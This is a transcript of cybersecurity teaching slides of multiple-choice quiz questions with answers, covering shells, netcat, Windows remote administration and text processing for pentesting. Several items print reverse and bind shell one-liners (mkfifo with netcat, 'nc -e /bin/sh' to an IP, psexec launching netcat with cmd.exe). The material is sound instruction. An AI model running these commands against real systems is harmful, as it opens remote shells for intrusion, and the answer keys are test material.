Presentation is loading. Please wait.

Presentation is loading. Please wait.

Penetration Testing & Network Defense

Published byΘαΐς Βλαστός Modified over 5 years ago

Similar presentations

Presentation on theme: "Penetration Testing & Network Defense"— Presentation transcript:

1 Penetration Testing & Network Defense
Basics/Preliminaries                     Peer Instruction Questions for Cybersecurity: Pentesting by William E. Johnson, Allison Luzader, Irfan Ahmed is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

2 What is a shell? A program that allows a user to display colorized output, clear and redraw the screen, etc. A program that allows a user to send raw commands (stdin) and get a raw response back (stdout) A program that contains a terminal and used to provide additional features to the terminal An exploitation mechanism that allows code to inject itself into a running process A program used to encapsulate and isolate a running binary through emulated system calls (such as Wine) Answer: B Category: Shell vs. Term

3 What is a terminal? A program that encapsulates a shell to provide more features such as colorized output and the ability to redraw the screen A program that allows a user to send raw commands (stdin) and get a raw response back (stdout) A program that facilitates remote access between machines A program used to encapsulate and isolate a running binary through emulated system calls (such as Wine) A program that allows remote termination of running processes Answer: A Category: Shell vs. Term

4 What does this pair of commands best accomplish
What does this pair of commands best accomplish? mkfifo pipe /bin/sh 0<pipe | nc [pentester IP] >pipe Create a local netcat server that serves a bash instance Run a shell script called “pipe” and serve it to a listener on the pentester’s IP Redirect stdin and stdout of a bash instance to a listener on the pentester’s IP Access stdin and stdout of a remotely running bash instance on the local pentester’s IP using a named pipe Answer: C Category: Simple proxy

5 You’ve established remote shell access to a machine with Netcat
You’ve established remote shell access to a machine with Netcat. Which of these commands will not function? cat /etc/passwd whoami more /etc/passwd hostname id Answer: C Category: Shell vs. Term

6 You’ve established remote shell access to a machine with Netcat
You’ve established remote shell access to a machine with Netcat. Which of these commands will function? more /etc/passwd vim /etc/passwd cat /etc/passwd less /etc/passwd top /etc/passwd Answer: C Category: Shell vs. term

7 You need terminal access to a remote machine to make use of a particular application. Assuming the machine has servers for each of these, which of these utilities will best provide that access? Telnet Netcat tsh SSH A or D Answer: D Category: Shell vs. Term

8 What does this command accomplish
What does this command accomplish? C:\> for /L %%i in (1,1,255) do sc \\ %%i query Attempt to connect with SMB to machines on /24 and list their running services in a command line Attempt to connect with SMB to machines on /24 and list their open ports in a command line Attempt to connect with SMB to machines on /24 and list their running services in a .bat script Attempt to connect with SMB to machines on /24 and list their open ports in a .bat script Answer: C Maybe this is too much info, but key pieces of information are the variable with two “%%”s indicating this belongs to a script, and sc query queries services Category: Remote access

9 What does this command best accomplish? C:\> wmic /node: /user:administrator /password:password process list full Send full process information to remote node Receive full process information from node Receive full process information for processes started by user “administrator” from Send full process information for processes started by user “administrator” to Answer: B Source: Category: Remote access

10 What does this command accomplish? nc –v –w 2 137.30.126.111 750
Scan port 750 on Open a bind shell on for 750 seconds Access a Netcat listener at on port 750 Create a reverse shell and send to a remote listener at on port 750 Answer: A Category: Port scanning

11 What does this command accomplish? nc –e /bin/sh 137.30.126.111 750
Scan port 750 on Open a bind shell on for 750 seconds Access a Netcat listener at on port 750 Create a reverse shell and send to a remote listener at on port 750 Answer: D Category: Reverse shell

12 What does the following command best accomplish. C:\> psexec \\137
What does the following command best accomplish? C:\> psexec \\ u myuser –p mypassword C:\nc.exe –l –p 1234 –e cmd.exe Create a bind shell on the local Windows machine that requires a user login Create a reverse shell on the local Windows machine that automatically logs into to provide the shell Log in to and create a bind shell on Log into a reverse shell that was provided to the local machine from Answer: C Category: Bind shell

13 You’re running this awk command against text output from a recon framework. What are the results? awk -F"," '{print $1, $3, $4}' results.out Insert commas after columns 1, 3, and 4 in the results file Print columns 1, 3, and 4 of a CSV results file Combine columns 1, 3, and 4 of each CSV file in the current directory and print output to results.out Insert commas between columns 1, 3, and 4 and print those to results.out Answer: B Category: awk

14 You’re running this sed command against a plaintext file
You’re running this sed command against a plaintext file. What does it accomplish? sed 's/,/\ /g’ input.txt Add a comma followed by a space between the first two tokens in the file Add a comma followed by a space between each token in the file Replace all spaces with commas in the file Replace the first space with a comma in the file Replace all commas with spaces in the file Answer: E Category: sed

15 What does this command accomplish. grep 137. 30. 120. 1 file
What does this command accomplish? grep file.txt | sed 's/,/\ /g’| awk ‘{print $4}’ > file_.txt Run awk on file_.txt to isolate the 4th column, replace any extraneous commas with spaces, and only print lines that contain “ ”, saving to file.txt Find lines in file.txt that contain “ ”, replace all commas with spaces, and then print the 4th column to file_.txt Find file.txt on , replace all commas in the file with spaces, and print the fourth column out to file_.txt Isolate the fourth column of file_.txt, replace extraneous commas with spaces, and save it to the found file.txt file on Answer: B Category: grep, awk, sed

16 Given a plaintext output file from a port scanner you’ve run, which of these tools will best help you find sections in the file based on some common pattern? sed awk grep bind A and D Answer: C Category: grep

Download ppt "Penetration Testing & Network Defense"

Similar presentations

Learning Unix/Linux Bioinformatics Orientation 2008 Eric Bishop.

Learning Unix/Linux Bioinformatics Orientation 2008 Eric Bishop.
6 UNIX Network Utilities Mauro Jaskelioff. Introduction Overview of computer networks Network related utilities –Accessing a remote computer –Transferring.

6 UNIX Network Utilities Mauro Jaskelioff. Introduction Overview of computer networks Network related utilities –Accessing a remote computer –Transferring.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Chapter 8 Files and User Information Utilities. Logical Partitions referred to as file systems like a drive in windows world $ df (display filesystems)

Chapter 8 Files and User Information Utilities. Logical Partitions referred to as file systems like a drive in windows world $ df (display filesystems)
Introducing the Command Line CMSC 121 Introduction to UNIX Much of the material in these slides was taken from Dan Hood’s CMSC 121 Lecture Notes.

Introducing the Command Line CMSC 121 Introduction to UNIX Much of the material in these slides was taken from Dan Hood’s CMSC 121 Lecture Notes.
Linux+ Guide to Linux Certification, Second Edition

Linux+ Guide to Linux Certification, Second Edition
Introduction to Unix – CS 21 Lecture 13. Lecture Overview Finding files and programs which whereis find xargs Putting it all together for some complex.

Introduction to Unix – CS 21 Lecture 13. Lecture Overview Finding files and programs which whereis find xargs Putting it all together for some complex.
Guide To UNIX Using Linux Third Edition

Guide To UNIX Using Linux Third Edition
Lecture 02CS311 – Operating Systems 1 1 CS311 – Lecture 02 Outline UNIX/Linux features – Redirection – pipes – Terminating a command – Running program.

Lecture 02CS311 – Operating Systems 1 1 CS311 – Lecture 02 Outline UNIX/Linux features – Redirection – pipes – Terminating a command – Running program.
UNIX Utilities Learning Objectives: 1. To understand the some basic utilities of UNIX File 2. To compare UNIX shell and popular shell 3. To learn Input/Output.

UNIX Utilities Learning Objectives: 1. To understand the some basic utilities of UNIX File 2. To compare UNIX shell and popular shell 3. To learn Input/Output.
“Linux at the Command Line” Don Johnson of BU IS&T.

“Linux at the Command Line” Don Johnson of BU IS&T.
MIS 5211.001 Week 7 Site:

MIS Week 7 Site:
Telnet/SSH: Connecting to Hosts Internet Technology1.

Telnet/SSH: Connecting to Hosts Internet Technology1.
1 Day 16 Sed and Awk. 2 Looking through output We already know what “grep” does. –It looks for something in a file. –Returns any line from the file that.

1 Day 16 Sed and Awk. 2 Looking through output We already know what “grep” does. –It looks for something in a file. –Returns any line from the file that.
Introduction to UNIX/Linux Exercises Dan Stanzione.

Introduction to UNIX/Linux Exercises Dan Stanzione.
Chapter Seven Advanced Shell Programming. 2 Lesson A Developing a Fully Featured Program.

Chapter Seven Advanced Shell Programming. 2 Lesson A Developing a Fully Featured Program.
Advanced Shell Programming. 2 Objectives Use techniques to ensure a script is employing the correct shell Set the default shell Configure Bash login and.

Advanced Shell Programming. 2 Objectives Use techniques to ensure a script is employing the correct shell Set the default shell Configure Bash login and.
Penetration Testing Training Day Capture the Flag Training.

Penetration Testing Training Day Capture the Flag Training.
Linux Tools. Tar tar – (Tape Archive). This is a tool for archiving files and directory hierarchies. tar output can be sent to stdout using the – file.

Linux Tools. Tar tar – (Tape Archive). This is a tool for archiving files and directory hierarchies. tar output can be sent to stdout using the – file.
Chapter 10 Networking and the Internet ITSC 1458.

Chapter 10 Networking and the Internet ITSC 1458.

Similar presentations

Ads by Google